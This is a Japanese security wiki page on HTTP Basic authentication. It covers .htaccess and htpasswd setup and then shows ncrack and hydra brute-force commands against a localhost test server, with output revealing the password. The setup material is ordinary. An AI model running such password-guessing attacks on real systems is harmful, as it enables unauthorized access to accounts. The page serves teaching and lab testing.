「Basic認証」の版間の差分

提供: セキュリティ
移動: 案内検索
(ページの作成:「Basic認証 とは、HTTPの認証方式の1つです。ユーザ名とパスワードを利用した認証です。パスワードは、暗号化され...」)
(相違点なし)

2014年5月20日 (火) 23:38時点における版

Basic認証 とは、HTTPの認証方式の1つです。ユーザ名とパスワードを利用した認証です。パスワードは、暗号化されません。Basic認証総当たり攻撃(ブルートフォース)ができるパスワードクラックツールとしてncrackhydraがあります。

読み方

Basic認証
べーしっく にんしょう

概要

Basic認証

使い方

.htaccess での設定の例です。 .htpasswd のようなパスワードファイルは、 htpasswd コマンドで作成します。

AuthType Basic
AuthName "Secret Zone"
AuthUserFile /home/www/basic/.htpasswd
Require valid-user

.htpasswd を新規作成する場合です。

$ htpasswd -b -c ./.htpasswd 'test' 'password'

htpasswdのコマンドラインオプションです。

Usage:
        htpasswd [-cimBdpsDv] [-C cost] passwordfile username
        htpasswd -b[cmBdpsDv] [-C cost] passwordfile username password
 
        htpasswd -n[imBdps] [-C cost] username
        htpasswd -nb[mBdps] [-C cost] username password
 -c  Create a new file.
 -n  Don't update file; display results on stdout.
 -b  Use the password from the command line rather than prompting for it.
 -i  Read password from stdin without verification (for script usage).
 -m  Force MD5 encryption of the password (default).
 -B  Force bcrypt encryption of the password (very secure).
 -C  Set the computing time used for the bcrypt algorithm
     (higher is more secure but slower, default: 5, valid: 4 to 31).
 -d  Force CRYPT encryption of the password (8 chars max, insecure).
 -s  Force SHA encryption of the password (insecure).
 -p  Do not encrypt the password (plaintext, insecure).
 -D  Delete the specified user.
 -v  Verify password for the specified user.
On other systems than Windows and NetWare the '-p' flag will probably not work.
The SHA algorithm does not use a salt and is less secure than the MD5 algorithm.

HTTPのBasic認証のクラッキング

ncrackによるHTTPのBasic認証のクラッキング

ncrackによるBasic認証のクラッキングの例です。

$ ncrack -v --user test \
-P /usr/local/share/ncrack/top50000.pwd http://127.0.0.1 -g path=/basic
 
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2014-05-20 23:22 JST
 
Discovered credentials on http://127.0.0.1:80 'test' 'admin'
http://127.0.0.1:80 finished.
 
Discovered credentials for http on 127.0.0.1 80/tcp:
127.0.0.1 80/tcp http: 'test' 'admin'
 
Ncrack done: 1 service scanned in 30.08 seconds.
Probes sent: 535 | timed-out: 0 | prematurely-closed: 0
 
Ncrack finished.

hydraによるHTTPのBasic認証のクラッキング

hydraによるBasic認証のクラッキングの例です。 ログインユーザ名test、パスワードがadminの場合の実行例です。

$ hydra -l 'test' -P /usr/local/share/ncrack/top50000.pwd http://localhost/basic
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
 
Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-20 01:15:59
[WARNING] The service http has been replaced with http-head and http-get,
using by default GET method. Same for https.
[DATA] 16 tasks, 1 server, 50084 login tries (l:1/p:50084), ~3130 tries per task
[DATA] attacking service http-get on port 80
[80][www] host: 127.0.0.1   login: test   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-20 01:16:05

関連項目